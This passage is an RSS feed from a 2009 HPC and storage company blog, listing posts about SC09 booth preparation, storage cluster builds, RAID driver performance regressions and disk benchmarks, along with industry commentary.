      <title>#sc09 [T-0]: The demo ...</title>
      <link>https://blog.scalability.org/2009/11/sc09-t-0-the-demo/</link>
      <pubDate>Mon, 16 Nov 2009 20:18:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-t-0-the-demo/</guid>
      <description>So we worked hard with our partners to get a demo going. One that highlighted their software, and our hardware. And we got this going with their kind and patient help. One problem. It goes so fast &amp;hellip; its done in about a second &amp;hellip; :)</description>
    </item>
    
    <item>
      <title>#sc09 : my talk at Minnesota Supercomputer Insitute&#39;s booth on Tuesday 3-3:30pm</title>
      <link>https://blog.scalability.org/2009/11/sc09-my-talk-at-minnesota-supercomputer-insitutes-booth-on-tuesday-3-330pm/</link>
      <pubDate>Mon, 16 Nov 2009 06:24:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-my-talk-at-minnesota-supercomputer-insitutes-booth-on-tuesday-3-330pm/</guid>
      <description>Please do come by, I may have shirts for people attending the talk if they ask good questions at the end (no, &amp;ldquo;what is your name&amp;rdquo; or &amp;ldquo;what is the airspeed of an unladen swallow&amp;rdquo; doesn&amp;rsquo;t count). We will be talking about the first installed siCluster storage cluster system, designed to enable scalable performance and capacity. We&amp;rsquo;ll cover goals, design considerations, implementation issues. And some benchmarks, though we are going to have an interesting caveat in them.</description>
    </item>
    
    <item>
      <title>SC09 [T-1 day]:  The booth is (mostly) up</title>
      <link>https://blog.scalability.org/2009/11/sc09-t-1-day-the-booth-is-mostly-up/</link>
      <pubDate>Mon, 16 Nov 2009 06:11:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-t-1-day-the-booth-is-mostly-up/</guid>
      <description>A JackRabbit JR4, and a Pegasus deskside supercomputer are there (booth 635 on the show floor, Intel Partner Pavilion). We ran into a cooling issue though, so I had to pull one of the GPU cards. Working on a few other things to fix. Might have a corrupted zip file for the demo (ugh). Will try to fix now. We are in booth 635 with several other partners of Intel. Come by and say hi!</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-11-16</title>
      <link>https://blog.scalability.org/2009/11/twitter-updates-for-2009-11-16/</link>
      <pubDate>Mon, 16 Nov 2009 06:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/twitter-updates-for-2009-11-16/</guid>
      <description>* On #[sc09](http://search.twitter.com/search?q=%23sc09) show floor booth 635 setting up the Pegasus box. Will ha a nice #[hpc](http://search.twitter.com/search?q=%23hpc) #[storage](http://search.twitter.com/search?q=%23storage) and processing machine [#](http://twitter.com/sijoe/statuses/5744988683)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>SC09 [T -3 days] shipped everything to the booth by UPS</title>
      <link>https://blog.scalability.org/2009/11/sc09-t-3-days-shipped-everything-to-the-booth-by-ups/</link>
      <pubDate>Fri, 13 Nov 2009 12:11:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-t-3-days-shipped-everything-to-the-booth-by-ups/</guid>
      <description>Hopefully it will get there. Had to disassemble the CPU coolers in the Pegasus, and remove the disks from the JackRabbit. Pegasus has a pair of rocking Nehalem W5590 chips, 32 hard disks, 48 GB ram, a Tesla, a GTX260, and a pair of 10GbE ports. The JackRabbit was doing 1.8GB/s reads and 1.3 GB/s writes in tests right before we shipped. It also as a pair of 10GbEs, 72 GB ram, and a pair of W5580 Nehalems.</description>
    </item>
    
    <item>
      <title>OT: comparing Droid to iPhone</title>
      <link>https://blog.scalability.org/2009/11/ot-comparing-droid-to-iphone/</link>
      <pubDate>Fri, 13 Nov 2009 12:06:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/ot-comparing-droid-to-iphone/</guid>
      <description>My Blackberry is dying. And Verizon seems to like to disable useful things, like GPS, Wifi, and all manner of other things. So these nice fancy phones &amp;hellip; its hard to make full use of them. I am looking at two options for replacement: iphone and droid. The latter is in a Motorola device, brand new, from Verizon. Verizon is at least getting the clue that disabling features is not a wise move in a competitive environment.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-11-12</title>
      <link>https://blog.scalability.org/2009/11/twitter-updates-for-2009-11-12/</link>
      <pubDate>Thu, 12 Nov 2009 06:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/twitter-updates-for-2009-11-12/</guid>
      <description>* Does anyone actually delete their pr0n followers? Or do you let them accumulate? Just curious. [#](http://twitter.com/sijoe/statuses/5641846105) * Machines for #[sc09](http://search.twitter.com/search?q=%23sc09) have been built. With any luck, we&#39;ll ship them tomorrow. Then I&#39;ll set it up at the booth. May buy a monitor there ... [#](http://twitter.com/sijoe/statuses/5641868843) * working on #[hpc](http://search.twitter.com/search?q=%23hpc) #[storage](http://search.twitter.com/search?q=%23storage) #[cluster](http://search.twitter.com/search?q=%23cluster) specs document for #[sc09](http://search.twitter.com/search?q=%23sc09) announcement [#](http://twitter.com/sijoe/statuses/5641897733)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>This doesn&#39;t look like its going to end any other way but badly</title>
      <link>https://blog.scalability.org/2009/11/this-doesnt-look-like-its-going-to-end-any-other-way-but-badly/</link>
      <pubDate>Wed, 11 Nov 2009 04:37:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/this-doesnt-look-like-its-going-to-end-any-other-way-but-badly/</guid>
      <description>News from the EU regulators. They are objecting to the hookup between Sun and Oracle. Whether or not their objections have merit &amp;hellip; their focus appears to be a loss of competition to Oracle from the &amp;ldquo;loss&amp;rdquo; of an independent MySQL &amp;hellip; this is not good for Sun. There are 2 possible outcomes from the EU at the end of the process. They will either accept the acquisition, or disallow it.</description>
    </item>
    
    <item>
      <title>SC09 talk bits</title>
      <link>https://blog.scalability.org/2009/11/sc09-talk-bits/</link>
      <pubDate>Tue, 10 Nov 2009 13:16:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-talk-bits/</guid>
      <description>I&amp;rsquo;ll be giving a talk at SC09 about the design and installation of our new siCluster (storage cluster) product. The talk is entitled &amp;ldquo;Feeding the hungry Gopher&amp;rdquo;. I&amp;rsquo;ll explain that in a moment. It is Tuesday, November 17th, 3-3:30pm, at the Minnesota Supercomputing Institute booth. The gopher is the mascot of the University of Minnesota. The hungry gopher(s) are, in this case, the 1000+ nodes of their new HP cluster named Itasca.</description>
    </item>
    
    <item>
      <title>SC09 booth bits</title>
      <link>https://blog.scalability.org/2009/11/sc09-booth-bits/</link>
      <pubDate>Tue, 10 Nov 2009 13:01:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-booth-bits/</guid>
      <description>Ok, here&amp;rsquo;s the scoop. We will be in the Intel Partner Pavilion booth #3077. We are going to be bringing a nice JackRabbit JR4 and a Pegasus-GPU unit. The JR4 will have a pair of nice fast Intel Nehalem CPUs in it (probably X5550&amp;rsquo;s), and the Pegasus will have a pair of W5580&amp;rsquo;s. Both units will have a bit of RAM, and the JR4 will have 24x 500 GB disks, while the Pegasus will have, get this, 32x 500 GB disks.</description>
    </item>
    
    <item>
      <title>The joy that is mmap ...</title>
      <link>https://blog.scalability.org/2009/11/the-joy-that-is-mmap/</link>
      <pubDate>Sat, 07 Nov 2009 18:59:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/the-joy-that-is-mmap/</guid>
      <description>Mmap is a way to provide file IO in a nice simple manner. Create a buffer area, and as you read/write into that buffer, this is reflected physically into the file. Oversimplification, but this is basically what it is. In most operating system, mmap makes direct use of the paging paths in the kernel. Why am I writing about this? Because the paging paths are some of the slowest paths in modern kernels, typically doing IO a page at a time.</description>
    </item>
    
    <item>
      <title>SC09 prep</title>
      <link>https://blog.scalability.org/2009/11/sc09-prep/</link>
      <pubDate>Mon, 02 Nov 2009 04:02:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-prep/</guid>
      <description>Next two weeks are going to be crazy. Prepping 2 machines for SC09, getting demos on there, testing them out (bits don&amp;rsquo;t die in transit &amp;hellip; oh no&amp;hellip; never happens :( ) Planning on a JR4 and a Pegasus. Likely a nice fast connection between the two. Pegasus will be interesting in that it will have many 2.5&amp;quot; disks, very fast Intel Nehalem chips, lots of RAM, and some nice fast GPU cards.</description>
    </item>
    
    <item>
      <title>Business brief</title>
      <link>https://blog.scalability.org/2009/11/business-brief/</link>
      <pubDate>Mon, 02 Nov 2009 03:50:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/business-brief/</guid>
      <description>If we simply stopped working today, after finishing up the orders in hand we need to deliver now, we would be reporting a 50% growth in revenue over last year. That is, if we worked for only 10 months out of 12&amp;hellip; . I won&amp;rsquo;t comment on our pipeline other than to say I like it. Did I mention I have been very busy?</description>
    </item>
    
    <item>
      <title>Weblog awards nominations open up on 2-Nov</title>
      <link>https://blog.scalability.org/2009/10/weblog-awards-nominations-open-up-on-2-nov/</link>
      <pubDate>Fri, 30 Oct 2009 13:41:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/weblog-awards-nominations-open-up-on-2-nov/</guid>
      <description>Folks, have a look at this. Please consider nominating and voting for your favorite tech/HPC blogs (no, not dropping any hints &amp;hellip; nosiree &amp;hellip; none whatsoever &amp;hellip; nothing to see here folks, move along &amp;hellip;).</description>
    </item>
    
    <item>
      <title>Would you take operational/marketing advice from someone without such experience?</title>
      <link>https://blog.scalability.org/2009/10/would-you-take-operationalmarketing-advice-from-someone-without-such-experience/</link>
      <pubDate>Fri, 30 Oct 2009 11:15:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/would-you-take-operationalmarketing-advice-from-someone-without-such-experience/</guid>
      <description>We are starting a process to get some additional capital into the company, apart from operations and profit generation. That is going well. One of the aspects of this are discussions with people over our strategy and other elements of the business. Some of these conversations are amusing. Some are annoying. Few are really helpful or insightful. That is, a great deal of time and effort is expended, with little return back for expending the time and effort.</description>
    </item>
    
    <item>
      <title>Reducing risk: avoiding the bricking phenomenon</title>
      <link>https://blog.scalability.org/2009/10/reducing-risk-avoiding-the-bricking-phenomenon/</link>
      <pubDate>Fri, 30 Oct 2009 10:52:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/reducing-risk-avoiding-the-bricking-phenomenon/</guid>
      <description>Something happened this week in a storage cluster we set up for a customer. You&amp;rsquo;ll hear more about the storage cluster at SC09, but thats not what this is about. This is about risk, and how to reduce it. Risk is a complex thing to define in practice, but there are several &amp;hellip; well &amp;hellip; simple ways you can indicate relative risk. A motherboard and power supply blew in one of our nodes.</description>
    </item>
    
    <item>
      <title>Updates:  storage cluster, SC09, and other things</title>
      <link>https://blog.scalability.org/2009/10/updates-storage-cluster-sc09-and-other-things/</link>
      <pubDate>Thu, 29 Oct 2009 01:40:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/updates-storage-cluster-sc09-and-other-things/</guid>
      <description>Been busy. Incredibly busy. Back with the storage cluster fixing a blown KVM and as I found this morning, a blown motherboard (and I am hoping that this is it, but we are preparing to replace all of the innards &amp;hellip; just in case). Storage cluster hit our performance targets in testing, even with IB running at 2/3 of rated speed. Working on finding out why 2/3 speed is the case vs full speed.</description>
    </item>
    
    <item>
      <title>Good performance numbers on the storage gluster</title>
      <link>https://blog.scalability.org/2009/10/good-performance-numbers-on-the-storage-gluster/</link>
      <pubDate>Fri, 23 Oct 2009 12:24:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/good-performance-numbers-on-the-storage-gluster/</guid>
      <description>I can&amp;rsquo;t go into them in depth, but we exceeded the performance targets (the system was purposefully designed to do this). The gluster team rocks! (I can&amp;rsquo;t emphasize this enough) Odd performance issue with the Mellanox QDR. Still trying to understand it, and hopefully will be able to update to our later kernel with the 1.5 OFED. I can say that running 24 parallel independent writes to each RAID w/o any parallel file system in there gave us about 20GB of sustained bandwidth to disk in aggregate, for writes far larger than system cache.</description>
    </item>
    
    <item>
      <title>Cloud is over-hyped? No ... you don&#39;t say ...</title>
      <link>https://blog.scalability.org/2009/10/cloud-is-over-hyped-no-you-dont-say/</link>
      <pubDate>Sun, 18 Oct 2009 14:37:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/cloud-is-over-hyped-no-you-dont-say/</guid>
      <description>There are some real nuggets of value in &amp;ldquo;the cloud&amp;rdquo;&amp;amp;tm; but as with &amp;ldquo;The Grid&amp;rdquo;&amp;amp;TM; there is a serious land grab underway, where everything is &amp;hellip; er &amp;hellip; cloudy. Yeah, thats a good phrase &amp;hellip; cloudy. Though nebulous fits as well. And of course, clouds being water vapor &amp;hellip; and often ice crystals &amp;hellip; I couldn&amp;rsquo;t resist, my apologies. More seriously, some analyst houses are noticing the massive over-hyping.
Now I am not a great fan of Gartner.</description>
    </item>
    
    <item>
      <title>IT storage ... why its not HPC storage, and shouldn&#39;t be used where you need HPC storage</title>
      <link>https://blog.scalability.org/2009/10/it-storage-why-its-not-hpc-storage-and-shouldnt-be-used-where-you-need-hpc-storage/</link>
      <pubDate>Sat, 17 Oct 2009 05:44:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/it-storage-why-its-not-hpc-storage-and-shouldnt-be-used-where-you-need-hpc-storage/</guid>
      <description>In a previous article, I railedon the concept of IT designing clusters. I pointed out many flaws we have seen when this happens. I&amp;rsquo;d like to do the same thing with storage. This will be brief. Recently had a customer for our consulting ask us with deep incredulity, how one of our older 24 drive 7200 RPM SATA drive units could so thoroughly demolish (on benchmark testing) a brand new 24 drive 15kRPM SAS drive unit.</description>
    </item>
    
    <item>
      <title>Disruption in HPC (and storage)</title>
      <link>https://blog.scalability.org/2009/10/disruption-in-hpc-and-storage/</link>
      <pubDate>Sat, 17 Oct 2009 02:28:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/disruption-in-hpc-and-storage/</guid>
      <description>On InsideHPC, John West has an interesting story on disruption in HPC markets, and predictions on success or failure of a business. There are some interesting tidbits evident throughout the article.
This made me smile.
Our Delta-V encompasses these ideas. Its designed to be a lower end storage target. The tools we have developed around it (and are continuing to develop) to enable simplified management are meant to make dealing with large numbers of these devices very easy.</description>
    </item>
    
    <item>
      <title>The tipping point for APUs</title>
      <link>https://blog.scalability.org/2009/10/the-tipping-point-for-apus/</link>
      <pubDate>Sat, 17 Oct 2009 01:29:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/the-tipping-point-for-apus/</guid>
      <description>This news item on InsideHPC made me smile. In short, the HPC application vendors do see the value in decreasing the cost of hardware for their HPC users. It keeps more money available for end users to purchase licenses, even in the face of declining budgets. There are other problems, such as the software license cost now being substantially higher than the cost of the hardware to run the HPC codes on, but that is another problem.</description>
    </item>
    
    <item>
      <title>HPC Community Leadership Awards: Poll at InsideHPC</title>
      <link>https://blog.scalability.org/2009/10/hpc-community-leadership-awards-poll-at-insidehpc/</link>
      <pubDate>Fri, 16 Oct 2009 23:28:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/hpc-community-leadership-awards-poll-at-insidehpc/</guid>
      <description>If you haven&amp;rsquo;t seen this yet, have a look at what the InsideHPC team are up to. They are hosting a poll on who (people/groups) are providing the most impactful leadership in HPC. The post and poll are here. By all means, do go and express your opinion via the poll, and drop a comment to John and the crew on this award.</description>
    </item>
    
    <item>
      <title>Been busy ...</title>
      <link>https://blog.scalability.org/2009/10/been-busy/</link>
      <pubDate>Fri, 16 Oct 2009 02:51:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/been-busy/</guid>
      <description>We just shipped (at 5pm tonight) the storage cluster. I didn&amp;rsquo;t announce any performance data for it. I can say that this unit has 24 RAID adapters. And QDR IB &amp;hellip; 8 ports (going to 16 as soon as the extra cables arrive). It is using GlusterFS as the cluster file system. This project has kept us very busy over the last month. We have more in queue that we are working on.</description>
    </item>
    
    <item>
      <title>Update on performance regression</title>
      <link>https://blog.scalability.org/2009/10/update-on-performance-regression/</link>
      <pubDate>Fri, 16 Oct 2009 02:30:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/update-on-performance-regression/</guid>
      <description>A new, updated, more stable RAID driver was used for our RAID card, and &amp;hellip; while it was more stable, it has a significant performance regression when used with our updated kernel (actually any kernel 2.6.23 and beyond). Should have a fix soon.</description>
    </item>
    
    <item>
      <title>Dealing with a severe performance regression</title>
      <link>https://blog.scalability.org/2009/10/dealing-with-a-severe-performance-regression/</link>
      <pubDate>Mon, 12 Oct 2009 17:10:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/dealing-with-a-severe-performance-regression/</guid>
      <description>Same hardware, booting into baseline kernel vs an updated version of our kernel. Normal testing on our part has our updated kernel at a significant performance advantage to the baseline. Imagine my surprise when, while trying to diagnose an issue on a machine we are building, we found baseline to be significantly faster. The only thing that has really changed between this and the older kernel is a newer driver for RAID.</description>
    </item>
    
    <item>
      <title>Was cash for clunkers a good thing after all?</title>
      <link>https://blog.scalability.org/2009/10/was-cash-for-clunkers-a-good-thing-after-all/</link>
      <pubDate>Mon, 05 Oct 2009 13:09:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/was-cash-for-clunkers-a-good-thing-after-all/</guid>
      <description>I had posited in the past that, apart from the odd design and old vehicle destruction, that yes, it was a good thing in terms of generating additional sales. I argued that it didn&amp;rsquo;t go on long enough. Germany has had one in force for months, and it seems to have done a great deal of good, though there was no requirement for destruction of the turned in car, it could be scrapped, or broken down for parts, or &amp;hellip; Ok.</description>
    </item>
    
    <item>
      <title>times like this put a smile on my face ...</title>
      <link>https://blog.scalability.org/2009/09/times-like-this-put-a-smile-on-my-face/</link>
      <pubDate>Wed, 30 Sep 2009 01:37:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/times-like-this-put-a-smile-on-my-face/</guid>
      <description>We are running some burn-in tests on the JackRabbit storage cluster. 6 of 8 nodes are up, 2 need to be looked at tomorrow. On one of the nodes, we have 3 RAID cards. Because of how the customer wants the unit, it is better for us to have 3 separate file systems. So thats what we have. They will all be aggregated shortly (hopefully tomorrow) with a nice cluster file system and some infiniband goodness.</description>
    </item>
    
    <item>
      <title>As the storage cluster builds ...</title>
      <link>https://blog.scalability.org/2009/09/as-the-storage-cluster-builds/</link>
      <pubDate>Mon, 28 Sep 2009 00:56:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/as-the-storage-cluster-builds/</guid>
      <description>Finally finished the Tiburon changes for the storage cluster config. Storage clusters are a bit different than computing clusters in a number of regards, not the least of those being the large RAID in the middle. In this case, the storage cluster is 8 identical JackRabbit JR5 units, each with 24 TB storage, 48 drives, 3 RAID cards, dual port QDR cards, and for our testing, we are using an SDR network (as we don&amp;rsquo;t have a nice 8 port QDR switch in house).</description>
    </item>
    
    <item>
      <title>Is RAID over?</title>
      <link>https://blog.scalability.org/2009/09/is-raid-over/</link>
      <pubDate>Fri, 25 Sep 2009 04:46:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/is-raid-over/</guid>
      <description>Henry Newman and a few other people I know are talking about RAID as being on the way out. John West pointed at this article this morning on InsideHPC. Their points are quite interesting. It boils down to this: If the time to rebuild a failed raid is comparable to the mean time between uncorrectable errors (UCE), due to reading/writing volume, then RAID as it is currently thought of, is going to need some serious rethinking.</description>
    </item>
    
    <item>
      <title>Been horrifically busy ... good busy ... but busy</title>
      <link>https://blog.scalability.org/2009/09/been-horrifically-busy-good-busy-but-busy/</link>
      <pubDate>Fri, 25 Sep 2009 02:15:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/been-horrifically-busy-good-busy-but-busy/</guid>
      <description>Will try to do updates soon, and I owe someone two articles (sorry!). Add to this fighting off a cold &amp;hellip; not a happy camper. Basically we are building an 8x JackRabbit JR5 storage cluster right now. I&amp;rsquo;ve caught a problem in Tiburon, our OS loader, in the process, and am fixing it. Tiburon is all about providing a very simple platform to enable PXE (and/or iSCSI) booting OSes to make installation/support simple.</description>
    </item>
    
    <item>
      <title>M&amp;A: Microsoft buys the *assets* of Interactive Supercomputing</title>
      <link>https://blog.scalability.org/2009/09/ma-microsoft-buys-the-assets-of-interactive-supercomputing/</link>
      <pubDate>Tue, 22 Sep 2009 23:43:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/ma-microsoft-buys-the-assets-of-interactive-supercomputing/</guid>
      <description>As seen on InsideHPC, John West notes that the assets of Star-P were purchased by Microsoft today. Parsing of words is important. The phrase &amp;ldquo;acquired the assets of X&amp;rdquo; means that the IP was purchased. John points to the blog post where Kyril Faenov mentions that some of the staff will work at the Microsoft Cambridge site. This is sadly, not a great exit for Star-P. Acquiring assets usually means the choice has been to shut down the company, and auction the bits off, or find a buyer for the distressed assets and then wind down the rest of the organization that doesn&amp;rsquo;t go with the assets.</description>
    </item>
    
    <item>
      <title>The looming (storage) bandwidth wall</title>
      <link>https://blog.scalability.org/2009/09/the-looming-storage-bandwidth-wall/</link>
      <pubDate>Mon, 21 Sep 2009 17:36:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/the-looming-storage-bandwidth-wall/</guid>
      <description>This has been bugging me for a while. Here is a simple measure of the height of the bandwidth wall. Take the size of your storage, and divide it by the maximum speed of your access to the data. This is the height of your wall, as measured in seconds. The time to read your data. The higher the wall, the more time you need to read your data. Ok, lets apply this in practice.</description>
    </item>
    
    <item>
      <title>M&amp;A continues:  Dell snarfs up PDS</title>
      <link>https://blog.scalability.org/2009/09/ma-continues-dell-snarfs-up-pds/</link>
      <pubDate>Mon, 21 Sep 2009 16:13:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/ma-continues-dell-snarfs-up-pds/</guid>
      <description>This is going to make a few Dell partners (Wipro et al) nervous. Sort of like the HP acquisition of EDS did. Is it possible that the service providers are going to be snapped up now to provide differentiated value in the face of declining revenues for hardware? Does this mean anything for HPC or storage?
Not this particular acquisition. Perot Data Systems wasn&amp;rsquo;t/isn&amp;rsquo;t really a player in HPC to any significant degree.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-09-16</title>
      <link>https://blog.scalability.org/2009/09/twitter-updates-for-2009-09-16/</link>
      <pubDate>Wed, 16 Sep 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/twitter-updates-for-2009-09-16/</guid>
      <description>* @[chris_bloke](http://twitter.com/chris_bloke) Oddly, I seem to remember my business partner working on stuff like this last year at his day job. Will ask. [in reply to chris_bloke](http://twitter.com/chris_bloke/statuses/3952863681) [#](http://twitter.com/sijoe/statuses/4005434311)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>We&#39;re Back!</title>
      <link>https://blog.scalability.org/2009/09/were-back-2/</link>
      <pubDate>Tue, 15 Sep 2009 04:54:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/were-back-2/</guid>
      <description>We were knocked off the air around 11pm on 13-September, by a machine finally deciding to give up its ghost. A partially retired machine which happened to run scalability.org decided, finally, that it no longer wished to correctly run grub. Grub being the thing essential to booting. Like the bootloader. Yeah. It was one of those nights.
I haven&amp;rsquo;t finished the figuring out why it died, and I am working on finishing restoring the services.</description>
    </item>
    
    <item>
      <title>Using fio to probe IOPs and detect internal system features</title>
      <link>https://blog.scalability.org/2009/09/using-fio-to-probe-iops-and-detect-internal-system-features/</link>
      <pubDate>Sat, 12 Sep 2009 14:29:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/using-fio-to-probe-iops-and-detect-internal-system-features/</guid>
      <description>Scalable Informatics JackRabbit JR3 16TB storage system, 12.3TB usable.
[root@jr3 ~]# df -m /data Filesystem 1M-blocks Used Available Use% Mounted on /dev/sdc2 12382376 425990 11956387 4% /data [root@jr3 ~]# df -h /data Filesystem Size Used Avail Use% Mounted on /dev/sdc2 12T 417G 12T 4% /data  These tests are more to show the quite remarkable utility of the fio tool than anything else. You can probe real issues in your system (as compared to a broad swath of &amp;lsquo;benchmark&amp;rsquo; tools that don&amp;rsquo;t really provide a useful or meaningful measure of anything) This is on a RAID6, so its not really optimal for for seeks.</description>
    </item>
    
    <item>
      <title>Scalable Informatics JackRabbit JR3 streaming benchmarks ... the next generation</title>
      <link>https://blog.scalability.org/2009/09/scalable-informatics-jackrabbit-jr3-streaming-benchmarks-the-next-generation/</link>
      <pubDate>Sat, 12 Sep 2009 01:33:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/scalable-informatics-jackrabbit-jr3-streaming-benchmarks-the-next-generation/</guid>
      <description>Previously, JackRabbit JR3 units, with single RAID cards, have been hovering around 750MB/s read and write. This was our second generation unit. First generation units were about 600 MB/s +/- a bit. The third generation unit is faster.
[root@jr3 ~]# dd if=/dev/zero of=/data/big.file ... 4096+0 records in 4096+0 records out 68719476736 bytes (69 GB) copied, 84.9058 seconds, 809 MB/s [root@jr3 ~]# dd if=/data/big.file of=/dev/null ... 4096+0 records in 4096+0 records out 68719476736 bytes (69 GB) copied, 66.</description>
    </item>
    
    <item>
      <title>Scalable Informatics is now part of the HPC Advisory council</title>
      <link>https://blog.scalability.org/2009/09/scalable-informatics-is-now-part-of-the-hpc-advisory-council/</link>
      <pubDate>Fri, 11 Sep 2009 20:20:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/scalable-informatics-is-now-part-of-the-hpc-advisory-council/</guid>
      <description>For the day job &amp;hellip; We are happy about joining this group. Interest in our high performance storage and computing systems continues to grow across multiple sectors. As users need to store and process exponentially growing amounts of data, they need systems, fabrics and designs capable of scaling without introducing additional barriers. This group represents those that build and those that use such technology.</description>
    </item>
    
    <item>
      <title>Not going to attend OLF this year, even though we want to</title>
      <link>https://blog.scalability.org/2009/09/not-going-to-attend-olf-this-year-even-though-we-want-to/</link>
      <pubDate>Fri, 11 Sep 2009 02:34:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/not-going-to-attend-olf-this-year-even-though-we-want-to/</guid>
      <description>Ohio Linux Fest is September 25-27, 2009 in Columbus OH this year. Sadly we won&amp;rsquo;t be going. The major reason we won&amp;rsquo;t be going is we plan to be at (or driving to) a customer site during that weekend. We are building a storage cluster for this customer, and we will be talking about it soon. The secondary reason is we are looking to more carefully deploy our marketing budget. There is a possibility of sharing a booth with a partner at SC09, and we don&amp;rsquo;t have an infinitely deep marketing budget, so I have to make choices.</description>
    </item>
    
    <item>
      <title>Fighting the dmraid/mdadm battles in initrd for RHEL/Centos 5.x</title>
      <link>https://blog.scalability.org/2009/09/fighting-the-dmraidmdadm-battles-in-initrd-for-rhelcentos-5-x/</link>
      <pubDate>Wed, 09 Sep 2009 04:11:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/fighting-the-dmraidmdadm-battles-in-initrd-for-rhelcentos-5-x/</guid>
      <description>dmraid is a technology to turn on-board fake-RAID (fRAID) systems into usable/bootable linux machines. It works for what it does, but you do need to be careful, as many of the fRAID chipsets have interesting &amp;hellip; er &amp;hellip; features. Yeah. Thats it, features. mdadm is a pure software version, requiring no assist from the bios. It can handle setting up RAID devices, and is our preferred way of creating RAID in software.</description>
    </item>
    
    <item>
      <title>sorry about the downtime ... quick OS upgrade on the server</title>
      <link>https://blog.scalability.org/2009/09/sorry-about-the-downtime-quick-os-upgrade-on-the-server/</link>
      <pubDate>Tue, 08 Sep 2009 04:38:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/sorry-about-the-downtime-quick-os-upgrade-on-the-server/</guid>
      <description>Been meaning to do this for a while. Of course, after I did this, the DB broke. And then I had to fix that. Ok, the DB itself didn&amp;rsquo;t break, but the install of it did. Long story, not worth telling. Punchline: with some RPM and yum commands, I eradicated the evil bits and allowed the good bits to prevail. Yeah, I know, I should just virtualize the box and run it where-ever.</description>
    </item>
    
    <item>
      <title>Non-locality in computing</title>
      <link>https://blog.scalability.org/2009/09/non-locality-in-computing/</link>
      <pubDate>Sun, 06 Sep 2009 10:11:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/non-locality-in-computing/</guid>
      <description>I read an article a few weeks ago that mirrors some of the things I&amp;rsquo;ve said in the past about computing on huge systems. Basically, when you have a system of sufficiently large size, the communications fabric between the nodes are such that for any ith and jth node, the latencies and transit times may not be uniform, or worse, there may be significant time cost to communicate between various nodes.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-09-05</title>
      <link>https://blog.scalability.org/2009/09/twitter-updates-for-2009-09-05/</link>
      <pubDate>Sat, 05 Sep 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/twitter-updates-for-2009-09-05/</guid>
      <description>* I just added myself to [http://twitr.org](http://twitr.org) Twitter Directory under #[hpc](http://search.twitter.com/search?q=%23hpc) #[storage](http://search.twitter.com/search?q=%23storage) #[accelerated](http://search.twitter.com/search?q=%23accelerated) [#](http://twitter.com/sijoe/statuses/3755531868)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>Zombie modeling, a possible new HPC application?</title>
      <link>https://blog.scalability.org/2009/09/zombie-modeling-a-possible-new-hpc-application/</link>
      <pubDate>Sat, 05 Sep 2009 00:50:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/zombie-modeling-a-possible-new-hpc-application/</guid>
      <description>I had a laugh when I read Professor Robert Smith?&amp;rsquo;shome page (the question mark is really there).
Ok &amp;hellip; imagine having a thesis advisor like this &amp;hellip; Man that would be fun research! Shawn of the dead as source material &amp;hellip;
Seriously, &amp;hellip;he has a paper on Zombie modeling, and the first few pages I glanced through, I actually think I understood. His focus is epidemiology. This is certainly something worthwhile, and it appears that the zombie modeling is using zombie as a placeholder for some unknown infectious disease with specific characteristics.</description>
    </item>
    
    <item>
      <title>Now thats one big pepperoni pizza!</title>
